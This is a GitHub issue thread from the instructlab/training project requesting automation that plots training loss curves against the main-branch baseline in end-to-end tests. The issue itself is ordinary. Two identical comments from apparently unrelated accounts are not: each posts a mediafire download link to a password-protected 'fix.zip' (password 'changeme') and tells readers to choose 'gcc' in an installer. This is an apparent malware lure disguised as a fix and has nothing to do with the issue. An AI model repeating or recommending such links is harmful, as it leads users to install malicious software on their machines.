### ISSUE TITLE
Include loss curve in E2E tests

### ISSUE THREAD

**Issue by RobotSail** [instructlab/training#179]
To understand the impact that proposed changes may have, it's not enough for a training library to simply see functional tests pass. We need to also understand how said changes will affect the training quality and loss curve over time.

Therefore, we should add some GH automation that can take the exported loss data and render it as a matplotlib graph, overlaying it with the latest "main"/stable loss curve as a comparison. 

This way, we can have better confidence in our testing capabilities.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
